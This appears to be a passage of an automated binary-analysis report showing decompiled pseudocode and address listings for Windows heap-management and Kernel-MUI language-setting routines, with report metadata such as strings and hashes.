                                          									if(__eflags != 0) {
                                          										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          										__eflags = _t543;
                                          									}
                                          									_push( *_t543 & 0x000000ff);
                                          									_push(_t446);
                                          									_push(_t446);
                                          									L120:
                                          									_push( *(_t553 + 0x74) << 3);
                                          									_push(_v52);
                                          									_t246 = E01A11411(_t446, _t553, _v44, __eflags);
                                          								}
                                          								goto L7;
                                          							}
                                          							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                          							_t339 = E0198174B( &_v44,  &_v52, 0x4000);
                                          							__eflags = _t339;
                                          							if(_t339 < 0) {
                                          								L94:
                                          								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
                                          								__eflags = _v40;
                                          								if(_v40 == 0) {
                                          									goto L153;
                                          								}
                                          								E0197B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
                                          								goto L152;
                                          							}
                                          							_t344 = E01977D50();
                                          							__eflags = _t344;
                                          							if(_t344 != 0) {
                                          								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          							} else {
                                          								_t347 = 0x7ffe0380;
                                          							}
                                          							__eflags =  *_t347;
                                          							if( *_t347 != 0) {
                                          								_t348 =  *[fs:0x30];
                                          								__eflags =  *(_t348 + 0x240) & 1;
                                          								if(( *(_t348 + 0x240) & 1) != 0) {
                                          									E01A114FB(_t445, _t553, _v44, _v52, 6);
                                          								}
                                          							}
                                          							_t513 = _v48;
                                          							goto L33;
                                          						}
                                          						__eflags =  *_v12 - 3;
                                          						_t513 = _v48;
                                          						if( *_v12 == 3) {
                                          							goto L27;
                                          						}
                                          						__eflags = _t460;
                                          						if(_t460 == 0) {
                                          							goto L9;
                                          						}
                                          						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
                                          						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
                                          							goto L9;
                                          						}
                                          						goto L27;
                                          					}
                                          				}
                                          				_t445 = _a4;
                                          				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
                                          					_t513 = __edx;
                                          					goto L10;
                                          				}
                                          				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
                                          				_v20 = _t433;
                                          				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
                                          					_t513 = _t539;
                                          					goto L9;
                                          				} else {
                                          					_t437 = E019799BF(__ecx, __edx,  &_a4, 0);
                                          					_t445 = _a4;
                                          					_t514 = _t437;
                                          					_v56 = _t514;
                                          					if(_t445 - 0x201 > 0xfbff) {
                                          						goto L14;
                                          					} else {
                                          						E0197A830(__ecx, _t514, _t445);
                                          						_t506 =  *(_t553 + 0x238);
                                          						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
                                          						_t246 = _t506 >> 4;
                                          						if(_t551 < _t506 - _t246) {
                                          							_t508 =  *(_t553 + 0x23c);
                                          							_t246 = _t508 >> 2;
                                          							__eflags = _t551 - _t508 - _t246;
                                          							if(_t551 > _t508 - _t246) {
                                          								_t246 = E0198ABD8(_t553);
                                          								 *(_t553 + 0x23c) = _t551;
                                          								 *(_t553 + 0x238) = _t551;
                                          							}
                                          						}
                                          						goto L7;
                                          					}
                                          				}
                                          			}



















































































                                          0x0197a309
                                          0x0197a316
                                          0x0197a319
                                          0x0197a31d
                                          0x0197a32d
                                          0x0197a331
                                          0x019c1e0d
                                          0x019c1e10
                                          0x0197a3cb
                                          0x0197a3cb
                                          0x0197a3bd
                                          0x0197a3c3
                                          0x0197a3c3
                                          0x0197a33a
                                          0x019c1e17
                                          0x019c1e1b
                                          0x019c1e1d
                                          0x019c1e2f
                                          0x019c1e34
                                          0x019c1e36
                                          0x019c1e3c
                                          0x019c1e3c
                                          0x019c1e3c
                                          0x019c1e3c
                                          0x019c1e36
                                          0x019c1e42
                                          0x019c1e45
                                          0x019c1e47
                                          0x0197a3f8
                                          0x0197a3f8
                                          0x0197a3fb
                                          0x0197a3fd
                                          0x019c1e50
                                          0x0197a403
                                          0x0197a411
                                          0x0197a411
                                          0x0197a411
                                          0x0197a41e
                                          0x0197a420
                                          0x0197a424
                                          0x0197a427
                                          0x0197a7c9
                                          0x0197a7cd
                                          0x0197a7d2
                                          0x0197a7d9
                                          0x0197a7e0
                                          0x0197a7e3
                                          0x0197a7ed
                                          0x0197a7f3
                                          0x0197a7f9
                                          0x0197a7ff
                                          0x0197a802
                                          0x0197a807
                                          0x0197a809
                                          0x0197a809
                                          0x0197a809
                                          0x0197a80f
                                          0x0197a80f
                                          0x0197a812
                                          0x0197a81c
                                          0x0197a821
                                          0x0197a824
                                          0x0197a42d
                                          0x0197a42d
                                          0x0197a42d
                                          0x0197a42d
                                          0x0197a42d
                                          0x0197a436
                                          0x0197a43a
                                          0x0197a609
                                          0x0197a60d
                                          0x0197a612
                                          0x0197a616
                                          0x0197a61a
                                          0x019c1e57
                                          0x019c1e59
                                          0x00000000
                                          0x00000000
                                          0x019c1e5f
                                          0x0197a620
                                          0x0197a627
                                          0x019c1e64
                                          0x019c1e66
                                          0x019c1e6c
                                          0x019c1e72
                                          0x019c1e76
                                          0x019c1e95
                                          0x019c1e9a
                                          0x019c1e78
                                          0x019c1e8d
                                          0x019c1e92
                                          0x019c1ea0
                                          0x019c1ea5
                                          0x019c1eaa
                                          0x019c1eb2
                                          0x019c1eb6
                                          0x019c1eb9
                                          0x019c1eb9
                                          0x019c1ebe
                                          0x019c1ec2
                                          0x019c1ec2
                                          0x019c1e66
                                          0x0197a62d
                                          0x0197a633
                                          0x0197a636
                                          0x0197a63a
                                          0x0197a63c
                                          0x0197a640
                                          0x0197a642
                                          0x0197a644
                                          0x0197a644
                                          0x0197a644
                                          0x0197a64d
                                          0x0197a64d
                                          0x0197a651
                                          0x0197a655
                                          0x019c1eca
                                          0x019c1ed1
                                          0x00000000
                                          0x00000000
                                          0x019c1ed7
                                          0x00000000
                                          0x0197a65b
                                          0x0197a669
                                          0x0197a66e
                                          0x0197a670
                                          0x00000000
                                          0x00000000
                                          0x0197a676
                                          0x0197a67b
                                          0x0197a680
                                          0x0197a682
                                          0x019c1f1a
                                          0x0197a688
                                          0x0197a688
                                          0x0197a688
                                          0x0197a68a
                                          0x0197a68d
                                          0x019c1f24
                                          0x019c1f2a
                                          0x019c1f31
                                          0x019c1f43
                                          0x019c1f43
                                          0x019c1f31
                                          0x0197a693
                                          0x0197a697
                                          0x0197a69d
                                          0x0197a6a0
                                          0x0197a6a6
                                          0x0197a6a8
                                          0x0197a6a8
                                          0x0197a6a8
                                          0x0197a6a8
                                          0x0197a6b2
                                          0x0197a6b7
                                          0x0197a6c1
                                          0x0197a6c6
                                          0x0197a6d2
                                          0x0197a6d9
                                          0x0197a6e3
                                          0x0197a6e6
                                          0x0197a6eb
                                          0x0197a6ed
                                          0x0197a6ed
                                          0x0197a6ed
                                          0x0197a6ed
                                          0x0197a6f3
                                          0x0197a6f8
                                          0x0197a702
                                          0x0197a70a
                                          0x0197a70e
                                          0x0197a71a
                                          0x0197a71e
                                          0x019c1fcb
                                          0x019c1fcf
                                          0x019c1fdd
                                          0x019c1fe3
                                          0x019c1fe3
                                          0x0197a724
                                          0x0197a728
                                          0x0197a72a
                                          0x0197a72d
                                          0x0197a737
                                          0x0197a73a
                                          0x0197a73c
                                          0x0197a742
                                          0x0197a748
                                          0x019c1f4d
                                          0x019c1f50
                                          0x019c1f56
                                          0x019c1f5c
                                          0x019c1f5f
                                          0x019c1f7e
                                          0x019c1f83
                                          0x019c1f61
                                          0x019c1f76
                                          0x019c1f7b
                                          0x019c1f89
                                          0x019c1f8e
                                          0x019c1f93
                                          0x019c1f94
                                          0x019c1f9a
                                          0x019c1f9c
                                          0x019c1f9e
                                          0x019c1fa1
                                          0x019c1fa1
                                          0x019c1fa6
                                          0x019c1fa6
                                          0x019c1f50
                                          0x0197a74e
                                          0x0197a751
                                          0x0197a754
                                          0x0197a75d
                                          0x0197a75e
                                          0x0197a762
                                          0x0197a767
                                          0x019c1faf
                                          0x019c1fb0
                                          0x019c1fb9
                                          0x019c1fbe
                                          0x019c1fc2
                                          0x019c1fc2
                                          0x0197a76d
                                          0x0197a76d
                                          0x0197a775
                                          0x0197a778
                                          0x0197a77d
                                          0x0197a77d
                                          0x0197a71e
                                          0x0197a782
                                          0x0197a787
                                          0x0197a789
                                          0x019c1ff3
                                          0x0197a78f
                                          0x0197a78f
                                          0x0197a78f
                                          0x0197a791
                                          0x0197a794
                                          0x019c1ffd
                                          0x019c2006
                                          0x019c200c
                                          0x019c2017
                                          0x019c2019
                                          0x019c2024
                                          0x019c2024
                                          0x019c2024
                                          0x019c2047
                                          0x019c2047
                                          0x019c200c
                                          0x0197a79a
                                          0x0197a79f
                                          0x0197a7a4
                                          0x0197a7a9
                                          0x0197a7ab
                                          0x019c205a
                                          0x0197a7b1
                                          0x0197a7b1
                                          0x0197a7b1
                                          0x0197a7b3
                                          0x0197a7b6
                                          0x00000000
                                          0x0197a7bc
                                          0x019c2066
                                          0x019c2068
                                          0x019c2073
                                          0x019c2073
                                          0x019c2073
                                          0x019c2078
                                          0x019c2079
                                          0x019c207d
                                          0x00000000
                                          0x019c207d
                                          0x0197a7b6
                                          0x0197a440
                                          0x0197a440
                                          0x0197a440
                                          0x0197a446
                                          0x0197a44c
                                          0x0197a44f
                                          0x0197a453
                                          0x0197a455
                                          0x019c20b3
                                          0x019c20b9
                                          0x019c20b9
                                          0x0197a45d
                                          0x0197a460
                                          0x0197a464
                                          0x0197a466
                                          0x0197a46b
                                          0x0197a46f
                                          0x0197a471
                                          0x0197a471
                                          0x0197a471
                                          0x0197a474
                                          0x0197a479
                                          0x0197a47d
                                          0x0197a47f
                                          0x019c2229
                                          0x019c222f
                                          0x0197a3c8
                                          0x0197a3c8
                                          0x0197a3ca
                                          0x0197a3ca
                                          0x00000000
                                          0x0197a3ca
                                          0x019c2235
                                          0x019c223a
                                          0x019c223a
                                          0x00000000
                                          0x00000000
                                          0x019c2240
                                          0x019c2246
                                          0x019c224a
                                          0x019c2269
                                          0x019c226e
                                          0x019c224c
                                          0x019c2261
                                          0x019c2266
                                          0x019c2274
                                          0x019c2279
                                          0x019c227e
                                          0x019c2286
                                          0x019c2288
                                          0x019c228d
                                          0x019c228d
                                          0x019c2292
                                          0x019c2292
                                          0x019c2295
                                          0x019c2295
                                          0x00000000
                                          0x019c2295
                                          0x0197a485
                                          0x0197a489
                                          0x0197a48b
                                          0x0197a48f
                                          0x0197a493
                                          0x0197a497
                                          0x0197a49b
                                          0x0197a4bb
                                          0x0197a4bb
                                          0x0197a4bd
                                          0x0197a4ff
                                          0x0197a4ff
                                          0x0197a501
                                          0x0197a505
                                          0x0197a50f
                                          0x0197a517
                                          0x0197a51b
                                          0x0197a527
                                          0x0197a52b
                                          0x019c2182
                                          0x019c2185
                                          0x019c2193
                                          0x019c2199
                                          0x019c2199
                                          0x0197a531
                                          0x0197a535
                                          0x0197a538
                                          0x0197a548
                                          0x0197a54b
                                          0x0197a54d
                                          0x0197a553
                                          0x0197a559
                                          0x019c2100
                                          0x019c2103
                                          0x019c2109
                                          0x019c210f
                                          0x019c2112
                                          0x019c2131
                                          0x019c2136
                                          0x019c2114
                                          0x019c2129
                                          0x019c212e
                                          0x019c213c
                                          0x019c2141
                                          0x019c2147
                                          0x019c214d
                                          0x019c2151
                                          0x019c2154
                                          0x019c2154
                                          0x019c2159
                                          0x019c2159
                                          0x019c2103
                                          0x0197a55f
                                          0x0197a562
                                          0x0197a565
                                          0x0197a567
                                          0x019c2162
                                          0x0197a56d
                                          0x0197a574
                                          0x0197a575
                                          0x0197a579
                                          0x0197a57e
                                          0x019c2169
                                          0x019c216a
                                          0x019c2170
                                          0x019c2175
                                          0x019c2179
                                          0x019c2179
                                          0x0197a57e
                                          0x0197a584
                                          0x0197a58f
                                          0x0197a58f
                                          0x0197a52b
                                          0x0197a5ad
                                          0x0197a5bc
                                          0x0197a5c1
                                          0x0197a5c6
                                          0x0197a5cb
                                          0x0197a5cd
                                          0x019c21a9
                                          0x0197a5d3
                                          0x0197a5d3
                                          0x0197a5d3
                                          0x0197a5d5
                                          0x0197a5d8
                                          0x019c21b3
                                          0x019c21bc
                                          0x019c21c2
                                          0x019c21cd
                                          0x019c21cf
                                          0x019c21da
                                          0x019c21da
                                          0x019c21da
                                          0x019c21f7
                                          0x019c21f7
                                          0x019c21c2
                                          0x0197a5de
                                          0x0197a5e3
                                          0x0197a5e8
                                          0x0197a5ea
                                          0x019c220a
                                          0x0197a5f0
                                          0x0197a5f0
                                          0x0197a5f0
                                          0x0197a5f2
                                          0x0197a5f5
                                          0x019c2219
                                          0x019c221b
                                          0x019c208c
                                          0x019c208c
                                          0x019c208c
                                          0x019c2095
                                          0x019c2096
                                          0x019c2097
                                          0x019c2098
                                          0x019c20a4
                                          0x019c20a5
                                          0x019c20a9
                                          0x019c20a9
                                          0x00000000
                                          0x0197a5f5
                                          0x0197a4bf
                                          0x0197a4d3
                                          0x0197a4d8
                                          0x0197a4da
                                          0x019c1ede
                                          0x019c1ede
                                          0x019c1ee4
                                          0x019c1ee9
                                          0x00000000
                                          0x00000000
                                          0x019c1f07
                                          0x00000000
                                          0x019c1f07
                                          0x0197a4e0
                                          0x0197a4e5
                                          0x0197a4e7
                                          0x019c20cb
                                          0x0197a4ed
                                          0x0197a4ed
                                          0x0197a4ed
                                          0x0197a4f2
                                          0x0197a4f5
                                          0x019c20d5
                                          0x019c20de
                                          0x019c20e4
                                          0x019c20f6
                                          0x019c20f6
                                          0x019c20e4
                                          0x0197a4fb
                                          0x00000000
                                          0x0197a4fb
                                          0x0197a4a1
                                          0x0197a4a4
                                          0x0197a4a8
                                          0x00000000
                                          0x00000000
                                          0x0197a4aa
                                          0x0197a4ac
                                          0x00000000
                                          0x00000000
                                          0x0197a4b2
                                          0x0197a4b5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0197a4b5
                                          0x0197a43a
                                          0x0197a340
                                          0x0197a346
                                          0x0197a600
                                          0x00000000
                                          0x0197a600
                                          0x0197a34f
                                          0x0197a351
                                          0x0197a358
                                          0x0197a3c6
                                          0x00000000
                                          0x0197a371
                                          0x0197a37a
                                          0x0197a37f
                                          0x0197a382
                                          0x0197a384
                                          0x0197a394
                                          0x00000000
                                          0x0197a396
                                          0x0197a399
                                          0x0197a3a7
                                          0x0197a3b0
                                          0x0197a3b4
                                          0x0197a3bb
                                          0x0197a3d2
                                          0x0197a3da
                                          0x0197a3df
                                          0x0197a3e1
                                          0x0197a3e5
                                          0x0197a3ea
                                          0x0197a3f0
                                          0x0197a3f0
                                          0x0197a3e1
                                          0x00000000
                                          0x0197a3bb
                                          0x0197a394

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-523794902
                                          • Opcode ID: 2401aef315819036b67485b5931cbe61c9438d97fd6849729e47e274d2735cb4
                                          • Instruction ID: 08b4af9c4f85cc9c22a52dde218ffa1c954fe8b36f85de5b046194c6663d54b7
                                          • Opcode Fuzzy Hash: 2401aef315819036b67485b5931cbe61c9438d97fd6849729e47e274d2735cb4
                                          • Instruction Fuzzy Hash: 7742CF316083829FD715DF28C884B2EBBE9FF98A04F18496DE58A8B352D734D941CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E01963D34(signed int* __ecx) {
                                          				signed int* _v8;
                                          				char _v12;
                                          				signed int* _v16;
                                          				signed int* _v20;
                                          				char _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				char _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int* _v48;
                                          				signed int* _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				char _v68;
                                          				signed int _t140;
                                          				signed int _t161;
                                          				signed int* _t236;
                                          				signed int* _t242;
                                          				signed int* _t243;
                                          				signed int* _t244;
                                          				signed int* _t245;
                                          				signed int _t255;
                                          				void* _t257;
                                          				signed int _t260;
                                          				void* _t262;
                                          				signed int _t264;
                                          				void* _t267;
                                          				signed int _t275;
                                          				signed int* _t276;
                                          				short* _t277;
                                          				signed int* _t278;
                                          				signed int* _t279;
                                          				signed int* _t280;
                                          				short* _t281;
                                          				signed int* _t282;
                                          				short* _t283;
                                          				signed int* _t284;
                                          				void* _t285;
                                          
                                          				_v60 = _v60 | 0xffffffff;
                                          				_t280 = 0;
                                          				_t242 = __ecx;
                                          				_v52 = __ecx;
                                          				_v8 = 0;
                                          				_v20 = 0;
                                          				_v40 = 0;
                                          				_v28 = 0;
                                          				_v32 = 0;
                                          				_v44 = 0;
                                          				_v56 = 0;
                                          				_t275 = 0;
                                          				_v16 = 0;
                                          				if(__ecx == 0) {
                                          					_t280 = 0xc000000d;
                                          					_t140 = 0;
                                          					L50:
                                          					 *_t242 =  *_t242 | 0x00000800;
                                          					_t242[0x13] = _t140;
                                          					_t242[0x16] = _v40;
                                          					_t242[0x18] = _v28;
                                          					_t242[0x14] = _v32;
                                          					_t242[0x17] = _t275;
                                          					_t242[0x15] = _v44;
                                          					_t242[0x11] = _v56;
                                          					_t242[0x12] = _v60;
                                          					return _t280;
                                          				}
                                          				if(E01961B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                          					_v56 = 1;
                                          					if(_v8 != 0) {
                                          						L019777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                          					}
                                          					_v8 = _t280;
                                          				}
                                          				if(E01961B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                          					_v60 =  *_v8;
                                          					L019777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                          					_v8 = _t280;
                                          				}
                                          				if(E01961B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                          					L16:
                                          					if(E01961B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                          						L28:
                                          						if(E01961B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                          							L46:
                                          							_t275 = _v16;
                                          							L47:
                                          							_t161 = 0;
                                          							L48:
                                          							if(_v8 != 0) {
                                          								L019777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                          							}
                                          							_t140 = _v20;
                                          							if(_t140 != 0) {
                                          								if(_t275 != 0) {
                                          									L019777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                          									_t275 = 0;
                                          									_v28 = 0;
                                          									_t140 = _v20;
                                          								}
                                          							}
                                          							goto L50;
                                          						}
                                          						_t167 = _v12;
                                          						_t255 = _v12 + 4;
                                          						_v44 = _t255;
                                          						if(_t255 == 0) {
                                          							_t276 = _t280;
                                          							_v32 = _t280;
                                          						} else {
                                          							_t276 = L01974620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                          							_t167 = _v12;
                                          							_v32 = _t276;
                                          						}
                                          						if(_t276 == 0) {
                                          							_v44 = _t280;
                                          							_t280 = 0xc0000017;
                                          							goto L46;
                                          						} else {
                                          							E0199F3E0(_t276, _v8, _t167);
                                          							_v48 = _t276;
                                          							_t277 = E019A1370(_t276, 0x1934e90);
                                          							_pop(_t257);
                                          							if(_t277 == 0) {
                                          								L38:
                                          								_t170 = _v48;
                                          								if( *_v48 != 0) {
                                          									E0199BB40(0,  &_v68, _t170);
                                          									if(L019643C0( &_v68,  &_v24) != 0) {
                                          										_t280 =  &(_t280[0]);
                                          									}
                                          								}
                                          								if(_t280 == 0) {
                                          									_t280 = 0;
                                          									L019777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                          									_v44 = 0;
                                          									_v32 = 0;
                                          								} else {
                                          									_t280 = 0;
                                          								}
                                          								_t174 = _v8;
                                          								if(_v8 != 0) {
                                          									L019777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                          								}
                                          								_v8 = _t280;
                                          								goto L46;
                                          							}
                                          							_t243 = _v48;
                                          							do {
                                          								 *_t277 = 0;
                                          								_t278 = _t277 + 2;
                                          								E0199BB40(_t257,  &_v68, _t243);
                                          								if(L019643C0( &_v68,  &_v24) != 0) {
                                          									_t280 =  &(_t280[0]);
                                          								}
                                          								_t243 = _t278;
                                          								_t277 = E019A1370(_t278, 0x1934e90);
                                          								_pop(_t257);
                                          							} while (_t277 != 0);
                                          							_v48 = _t243;
                                          							_t242 = _v52;
                                          							goto L38;
                                          						}
                                          					}
                                          					_t191 = _v12;
                                          					_t260 = _v12 + 4;
                                          					_v28 = _t260;
                                          					if(_t260 == 0) {
                                          						_t275 = _t280;
                                          						_v16 = _t280;
                                          					} else {
                                          						_t275 = L01974620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                          						_t191 = _v12;
                                          						_v16 = _t275;
                                          					}
                                          					if(_t275 == 0) {
                                          						_v28 = _t280;
                                          						_t280 = 0xc0000017;
                                          						goto L47;
                                          					} else {
                                          						E0199F3E0(_t275, _v8, _t191);
                                          						_t285 = _t285 + 0xc;
                                          						_v48 = _t275;
                                          						_t279 = _t280;
                                          						_t281 = E019A1370(_v16, 0x1934e90);
                                          						_pop(_t262);
                                          						if(_t281 != 0) {
                                          							_t244 = _v48;
                                          							do {
                                          								 *_t281 = 0;
                                          								_t282 = _t281 + 2;
                                          								E0199BB40(_t262,  &_v68, _t244);
                                          								if(L019643C0( &_v68,  &_v24) != 0) {
                                          									_t279 =  &(_t279[0]);
                                          								}
                                          								_t244 = _t282;
                                          								_t281 = E019A1370(_t282, 0x1934e90);
                                          								_pop(_t262);
                                          							} while (_t281 != 0);
                                          							_v48 = _t244;
                                          							_t242 = _v52;
                                          						}
                                          						_t201 = _v48;
                                          						_t280 = 0;
                                          						if( *_v48 != 0) {
                                          							E0199BB40(_t262,  &_v68, _t201);
                                          							if(L019643C0( &_v68,  &_v24) != 0) {
                                          								_t279 =  &(_t279[0]);
                                          							}
                                          						}
                                          						if(_t279 == 0) {
                                          							L019777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                          							_v28 = _t280;
                                          							_v16 = _t280;
                                          						}
                                          						_t202 = _v8;
                                          						if(_v8 != 0) {
                                          							L019777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                          						}
                                          						_v8 = _t280;
                                          						goto L28;
                                          					}
                                          				}
                                          				_t214 = _v12;
                                          				_t264 = _v12 + 4;
                                          				_v40 = _t264;
                                          				if(_t264 == 0) {
                                          					_v20 = _t280;
                                          				} else {
                                          					_t236 = L01974620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                          					_t280 = _t236;
                                          					_v20 = _t236;
                                          					_t214 = _v12;
                                          				}
                                          				if(_t280 == 0) {
                                          					_t161 = 0;
                                          					_t280 = 0xc0000017;
                                          					_v40 = 0;
                                          					goto L48;
                                          				} else {
                                          					E0199F3E0(_t280, _v8, _t214);
                                          					_t285 = _t285 + 0xc;
                                          					_v48 = _t280;
                                          					_t283 = E019A1370(_t280, 0x1934e90);
                                          					_pop(_t267);
                                          					if(_t283 != 0) {
                                          						_t245 = _v48;
                                          						do {
                                          							 *_t283 = 0;
                                          							_t284 = _t283 + 2;
                                          							E0199BB40(_t267,  &_v68, _t245);
                                          							if(L019643C0( &_v68,  &_v24) != 0) {
                                          								_t275 = _t275 + 1;
                                          							}
                                          							_t245 = _t284;
                                          							_t283 = E019A1370(_t284, 0x1934e90);
                                          							_pop(_t267);
                                          						} while (_t283 != 0);
                                          						_v48 = _t245;
                                          						_t242 = _v52;
                                          					}
                                          					_t224 = _v48;
                                          					_t280 = 0;
                                          					if( *_v48 != 0) {
                                          						E0199BB40(_t267,  &_v68, _t224);
                                          						if(L019643C0( &_v68,  &_v24) != 0) {
                                          							_t275 = _t275 + 1;
                                          						}
                                          					}
                                          					if(_t275 == 0) {
                                          						L019777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                          						_v40 = _t280;
                                          						_v20 = _t280;
                                          					}
                                          					_t225 = _v8;
                                          					if(_v8 != 0) {
                                          						L019777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                          					}
                                          					_v8 = _t280;
                                          					goto L16;
                                          				}
                                          			}










































                                          0x01963d3c
                                          0x01963d42
                                          0x01963d44
                                          0x01963d46
                                          0x01963d49
                                          0x01963d4c
                                          0x01963d4f
                                          0x01963d52
                                          0x01963d55
                                          0x01963d58
                                          0x01963d5b
                                          0x01963d5f
                                          0x01963d61
                                          0x01963d66
                                          0x019b8213
                                          0x019b8218
                                          0x01964085
                                          0x01964088
                                          0x0196408e
                                          0x01964094
                                          0x0196409a
                                          0x019640a0
                                          0x019640a6
                                          0x019640a9
                                          0x019640af
                                          0x019640b6
                                          0x019640bd
                                          0x019640bd
                                          0x01963d83
                                          0x019b821f
                                          0x019b8229
                                          0x019b8238
                                          0x019b8238
                                          0x019b823d
                                          0x019b823d
                                          0x01963da0
                                          0x01963daf
                                          0x01963db5
                                          0x01963dba
                                          0x01963dba
                                          0x01963dd4
                                          0x01963e94
                                          0x01963eab
                                          0x01963f6d
                                          0x01963f84
                                          0x0196406b
                                          0x0196406b
                                          0x0196406e
                                          0x0196406e
                                          0x01964070
                                          0x01964074
                                          0x019b8351
                                          0x019b8351
                                          0x0196407a
                                          0x0196407f
                                          0x019b835d
                                          0x019b8370
                                          0x019b8377
                                          0x019b8379
                                          0x019b837c
                                          0x019b837c
                                          0x019b835d
                                          0x00000000
                                          0x0196407f
                                          0x01963f8a
                                          0x01963f8d
                                          0x01963f90
                                          0x01963f95
                                          0x019b830d
                                          0x019b830f
                                          0x01963f9b
                                          0x01963fac
                                          0x01963fae
                                          0x01963fb1
                                          0x01963fb1
                                          0x01963fb6
                                          0x019b8317
                                          0x019b831a
                                          0x00000000
                                          0x01963fbc
                                          0x01963fc1
                                          0x01963fc9
                                          0x01963fd7
                                          0x01963fda
                                          0x01963fdd
                                          0x01964021
                                          0x01964021
                                          0x01964029
                                          0x01964030
                                          0x01964044
                                          0x01964046
                                          0x01964046
                                          0x01964044
                                          0x01964049
                                          0x019b8327
                                          0x019b8334
                                          0x019b8339
                                          0x019b833c
                                          0x0196404f
                                          0x0196404f
                                          0x0196404f
                                          0x01964051
                                          0x01964056
                                          0x01964063
                                          0x01964063
                                          0x01964068
                                          0x00000000
                                          0x01964068
                                          0x01963fdf
                                          0x01963fe2
                                          0x01963fe4
                                          0x01963fe7
                                          0x01963fef
                                          0x01964003
                                          0x01964005
                                          0x01964005
                                          0x0196400c
                                          0x01964013
                                          0x01964016
                                          0x01964017
                                          0x0196401b
                                          0x0196401e
                                          0x00000000
                                          0x0196401e
                                          0x01963fb6
                                          0x01963eb1
                                          0x01963eb4
                                          0x01963eb7
                                          0x01963ebc
                                          0x019b82a9
                                          0x019b82ab
                                          0x01963ec2
                                          0x01963ed3
                                          0x01963ed5
                                          0x01963ed8
                                          0x01963ed8
                                          0x01963edd
                                          0x019b82b3
                                          0x019b82b6
                                          0x00000000
                                          0x01963ee3
                                          0x01963ee8
                                          0x01963eed
                                          0x01963ef0
                                          0x01963ef3
                                          0x01963f02
                                          0x01963f05
                                          0x01963f08
                                          0x019b82c0
                                          0x019b82c3
                                          0x019b82c5
                                          0x019b82c8
                                          0x019b82d0
                                          0x019b82e4
                                          0x019b82e6
                                          0x019b82e6
                                          0x019b82ed
                                          0x019b82f4
                                          0x019b82f7
                                          0x019b82f8
                                          0x019b82fc
                                          0x019b82ff
                                          0x019b82ff
                                          0x01963f0e
                                          0x01963f11
                                          0x01963f16
                                          0x01963f1d
                                          0x01963f31
                                          0x019b8307
                                          0x019b8307
                                          0x01963f31
                                          0x01963f39
                                          0x01963f48
                                          0x01963f4d
                                          0x01963f50
                                          0x01963f50
                                          0x01963f53
                                          0x01963f58
                                          0x01963f65
                                          0x01963f65
                                          0x01963f6a
                                          0x00000000
                                          0x01963f6a
                                          0x01963edd
                                          0x01963dda
                                          0x01963ddd
                                          0x01963de0
                                          0x01963de5
                                          0x019b8245
                                          0x01963deb
                                          0x01963df7
                                          0x01963dfc
                                          0x01963dfe
                                          0x01963e01
                                          0x01963e01
                                          0x01963e06
                                          0x019b824d
                                          0x019b824f
                                          0x019b8254
                                          0x00000000
                                          0x01963e0c
                                          0x01963e11
                                          0x01963e16
                                          0x01963e19
                                          0x01963e29
                                          0x01963e2c
                                          0x01963e2f
                                          0x019b825c
                                          0x019b825f
                                          0x019b8261
                                          0x019b8264
                                          0x019b826c
                                          0x019b8280
                                          0x019b8282
                                          0x019b8282
                                          0x019b8289
                                          0x019b8290
                                          0x019b8293
                                          0x019b8294
                                          0x019b8298
                                          0x019b829b
                                          0x019b829b
                                          0x01963e35
                                          0x01963e38
                                          0x01963e3d
                                          0x01963e44
                                          0x01963e58
                                          0x019b82a3
                                          0x019b82a3
                                          0x01963e58
                                          0x01963e60
                                          0x01963e6f
                                          0x01963e74
                                          0x01963e77
                                          0x01963e77
                                          0x01963e7a
                                          0x01963e7f
